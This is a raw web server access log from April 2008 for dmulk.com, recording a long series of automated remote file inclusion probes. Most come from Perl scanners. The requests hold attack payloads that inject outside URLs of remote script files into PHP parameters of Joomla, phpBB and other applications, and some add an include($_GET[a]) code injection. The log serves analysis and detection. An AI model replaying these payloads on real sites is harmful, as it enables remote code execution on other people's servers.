203.200.95.142 - - [23/Apr/2008:12:46:41 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:12:46:42 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:12:46:42 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:46:46 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:12:46:49 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:47:01 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:47:01 -0700] "GET //main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:47:02 -0700] "GET /logs//main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.200.95.142 - - [23/Apr/2008:12:47:15 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
203.200.95.142 - - [23/Apr/2008:12:47:15 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
203.200.95.142 - - [23/Apr/2008:12:47:16 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:47:27 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:47:28 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:47:30 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.238.225.165 - - [23/Apr/2008:12:47:37 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.238.225.165 - - [23/Apr/2008:12:47:38 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:47:47 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [23/Apr/2008:12:47:47 -0700] "GET /logs/access.log/view.php?sub=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [23/Apr/2008:12:47:48 -0700] "GET /logs/view.php?sub=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.47.165.69 - - [23/Apr/2008:12:47:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.47.165.69 - - [23/Apr/2008:12:47:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:47:54 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:12:47:55 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [23/Apr/2008:12:48:06 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:48:10 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:48:11 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:48:14 -0700] "GET /logs/access_080131.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:48:30 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:48:31 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:48:31 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:48:58 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:49:04 -0700] "GET /logs/access_080312.log/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:49:04 -0700] "GET /alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:49:05 -0700] "GET /logs/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:49:14 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:49:22 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:49:22 -0700] "GET //main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:49:22 -0700] "GET /logs//main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:49:36 -0700] "GET /logs/access.log//errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:49:36 -0700] "GET //errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:49:36 -0700] "GET /logs//errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:49:41 -0700] "GET /logs/access_080312.log/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:49:41 -0700] "GET /alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:49:42 -0700] "GET /logs/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:49:45 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET%5Ba%5D),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:49:46 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:49:47 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:49:47 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.8.70 - - [23/Apr/2008:12:50:07 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.61.244.6 - - [23/Apr/2008:12:50:11 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.trosken.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
209.61.244.6 - - [23/Apr/2008:12:50:12 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.trosken.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
147.202.45.222 - - [23/Apr/2008:12:50:25 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
147.202.45.222 - - [23/Apr/2008:12:50:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:12:50:34 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:12:50:37 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:50:46 -0700] "GET /logs/access_080228.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.223.101.14 - - [23/Apr/2008:12:50:58 -0700] "GET /logs/access_080215.log/errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.101.14 - - [23/Apr/2008:12:50:58 -0700] "GET /errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.101.14 - - [23/Apr/2008:12:50:59 -0700] "GET /logs/errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.166 - - [23/Apr/2008:12:51:01 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
213.156.192.5 - - [23/Apr/2008:12:51:02 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.156.192.5 - - [23/Apr/2008:12:51:02 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.67.27.166 - - [23/Apr/2008:12:51:02 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
200.250.121.2 - - [23/Apr/2008:12:51:05 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.107 - - [23/Apr/2008:12:51:19 -0700] "GET /logs/access.log HTTP/1.0" 200 438491 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:51:21 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:51:21 -0700] "GET //main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:51:21 -0700] "GET /logs//main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
86.109.164.42 - - [23/Apr/2008:12:51:46 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.215.223.191 - - [23/Apr/2008:12:51:55 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.215.223.191 - - [23/Apr/2008:12:51:57 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:12:51:57 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:12:51:59 -0700] "GET /logs/access_080228.log/?svr_rootP=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:52:01 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:52:25 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.145.180 - - [23/Apr/2008:12:52:28 -0700] "GET /logs/access.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.145.180 - - [23/Apr/2008:12:52:28 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.145.180 - - [23/Apr/2008:12:52:29 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:52:45 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:53:18 -0700] "GET /logs/access_080215.log//errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.223.101.14 - - [23/Apr/2008:12:53:51 -0700] "GET /logs/access.log/errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.223.154.131 - - [23/Apr/2008:12:54:39 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.223.154.131 - - [23/Apr/2008:12:54:39 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.223.154.131 - - [23/Apr/2008:12:54:40 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:54:47 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:54:47 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:55:01 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:55:01 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:55:06 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:12:55:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:55:08 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://redrumfans.com/id?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:55:09 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.5.111.138 - - [23/Apr/2008:12:55:13 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://rootshell.altervista.org/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:12:55:43 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:55:46 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:55:50 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:55:57 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:55:57 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:55:58 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:55:58 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:55:58 -0700] "GET //main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:56:00 -0700] "GET /logs//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:56:00 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:56:00 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.42.75 - - [23/Apr/2008:12:56:01 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.164.42 - - [23/Apr/2008:12:56:02 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:12:56:07 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
